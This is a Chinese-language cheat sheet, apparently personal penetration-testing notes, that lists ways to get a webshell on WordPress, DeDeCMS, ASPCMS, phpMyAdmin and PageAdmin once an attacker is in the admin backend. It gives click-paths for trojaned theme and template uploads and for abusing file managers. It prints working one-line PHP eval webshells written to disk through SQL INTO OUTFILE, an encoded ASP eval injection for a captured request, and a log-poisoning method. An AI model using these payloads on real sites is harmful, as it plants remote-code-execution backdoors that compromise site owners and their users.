一、wordpass
1.修改模版文件getshell
- 搭建網站
- 登錄網站后臺
- 更改網站模版的相關文件
- 寫入一句話木馬
- 憑借路徑訪問
/wp-content/themes/twentyfifteen/404.php/?a=phpinfo();
2.上傳夾帶木馬的主題getshell
外觀-->主題-->添加-->上傳-->瀏覽-->安裝-->訪問木馬文件
主題打包上傳使用,拼接路徑訪問
/wp-content/themes/1/1.php
二、DeDeCMS
1.文件上傳管理器上傳木馬getshell
進入后臺--》核心--》文件管理器--》文件上傳。上傳完后使用上方路徑拼接訪問即可。
2.更改模版getshell
在模版模塊在index.htm里寫入一句話木馬,更改html文件為php文件后訪問。
3.系統sql注入getshell
在系統內的sql命令行執行中,可以先訪問它的數據庫絕對路徑,根據該路徑去推測網站絕對路徑,寫入一句話木馬到網站絕對路徑下。訪問文件連接
select @@basedir
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/'
三、ASPCMS
修改配置文件getshell
登錄網站后臺登錄后-->擴展功能-->幻燈片設置-->保存-->抓包更改請求體內容
http://ip/admin_aspcms/index.asp
抓包后更改內容要保證人家原有的%>能夠閉合
%25><%25eval (request(chr(65)))%25><%25
四、phpmyadmin
1.通過日志文件getshell
更改日志開啟模式,確保日志文件開啟,并更改日志文件存放位置
在sql語句輸入框內輸入一句話木馬,那么我們的木馬就會被帶到日志文件中,我們訪問日志文件即可連接。
2.寫入文件getshell
在該執行框中執行我們的命令,先查看數據庫路徑地址推測網站絕對路徑.
select @@basedir
select '<?php @eval($_POST[a]);?>' into outfile 'D:php/www/1.php'
五、Pageadmin
1.上傳模版getshell
上傳還有木馬文件的zip查插件安裝包,如果是正版的是可以進行解壓的,這里不是正版,各位知道一下即可。
2.上傳文件getshel
在工具里面的常用工具,文件管理上傳我們壓縮后的木馬文件,解壓就可以得到我們的asp可執行腳本文件。訪問連接即可。
)
